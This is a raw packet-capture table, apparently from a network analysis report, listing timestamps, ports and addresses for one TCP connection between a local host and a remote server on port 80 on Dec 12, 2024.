Dec 12, 2024 16:48:49.267054081 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.267076015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.268002033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.268105030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.268110991 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.269059896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.269117117 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.269288063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.270107985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.270160913 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.270199060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.271364927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.271384001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.271424055 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.272120953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.272177935 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.272208929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.273080111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.273132086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.273179054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.274111986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.274171114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.274173021 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.275099993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.275158882 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.275187016 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.276141882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.276222944 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.276252031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.277196884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.277266979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.277306080 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.278145075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.278206110 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.278273106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.279237986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.279284954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.279472113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.280215025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.280261993 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.280320883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.281261921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.281348944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.281358957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.282231092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.282284021 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.282321930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.283250093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.283301115 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.283364058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.284251928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.284302950 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.284370899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.285365105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.285418034 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.285454988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.286421061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.286468983 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.286493063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.287328005 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.287377119 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.287409067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.288311958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.288351059 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.288424015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.289328098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.289371967 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.289530039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.290334940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.290375948 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.290425062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.291347027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.291390896 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.291440964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.292356968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.292401075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.292654991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.293436050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.293513060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.293520927 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.294460058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.294492006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.294513941 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.295589924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.295629025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.295636892 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.296689034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.296744108 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.296772003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.297508001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.297558069 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.297575951 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.298466921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.298513889 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.298624992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.299530029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.299576998 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.299738884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.300491095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.300543070 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.300604105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.301561117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.301611900 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.301675081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.302608967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.302649021 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.302721024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.303610086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.303646088 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.303697109 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.304574966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.304615974 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.304693937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.305593967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.305634975 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.305664062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.306586027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.306623936 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.306696892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.307583094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.307624102 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.307674885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.308654070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.308693886 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.308830976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.309676886 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.309720039 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.309854031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.310709953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.310746908 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.310821056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.311719894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.311755896 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.311893940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.312706947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.312751055 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.312870026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.313705921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.313750029 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.313944101 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.314724922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.314771891 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.314802885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.315696955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.315738916 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.315809965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.316715956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.316756964 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.316823959 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.317732096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.317773104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.317831039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.318859100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.318902969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.319104910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.459136009 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.459239960 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.459422112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.459538937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.459553003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.459590912 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.460552931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.460601091 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.460633993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.461431026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.461477995 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.461549044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.462440014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.462488890 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.462562084 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.463459969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.463512897 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.463553905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.464570999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.464647055 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.464667082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.465509892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.465562105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.465831041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.466545105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.466594934 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.466648102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.467566967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.467607975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.467612028 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.468537092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.468585014 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.468710899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.469662905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.469711065 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.469775915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.470588923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.470638037 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.470664978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.471584082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.471632004 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.471659899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.472578049 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.472625971 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.472672939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.473596096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.473642111 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.473686934 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.474623919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.474672079 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.474729061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.475668907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.475722075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.475765944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.476651907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.476699114 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.476830006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.477646112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.477686882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.477694988 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.478748083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.478809118 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.478816986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.479718924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.479800940 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.479814053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.480709076 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.480767012 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.480815887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.481755018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.481805086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.481862068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.482747078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.482796907 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.482841015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.483752012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.483799934 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.483828068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.484762907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.484808922 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.484833002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.485815048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.485858917 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.485938072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.486809969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.486857891 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.486974955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.487812042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.487867117 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.487895012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.488831997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.488881111 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.489046097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.489860058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.489933014 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.489945889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.490864992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.490933895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.490933895 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.491869926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.491957903 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.491960049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.492892981 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.492945910 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.493000031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.493956089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.494014025 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.494041920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.494910955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.494965076 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.495008945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.495996952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.496071100 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.496182919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.496998072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.497045040 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.497072935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.497981071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.498028994 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.498078108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.498970032 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.499007940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.499016047 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.500001907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.500051022 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.500097990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.501044035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.501091957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.501168966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.502083063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.502094030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.502127886 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.503032923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.503082037 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.503134012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.504075050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.504125118 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.504167080 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.505059004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.505105972 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.505130053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.506151915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.506196976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.506277084 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.507117987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.507168055 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.507239103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.508119106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.508177996 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.508399963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.509119034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.509166956 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.509222031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.510158062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.510216951 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.510221004 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.511168003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.511217117 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.511271954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.512125969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.512182951 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.651283979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.651344061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.651637077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.651731968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.651837111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.651890039 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.652765989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.652952909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.653017044 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.653826952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.653949976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.654006958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.654886007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.654980898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.655039072 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.655812025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.655841112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.655893087 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.656793118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.656945944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.657001019 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.657814026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.657931089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.657984018 CET	49946	80	192.168.2.10	185.81.68.147
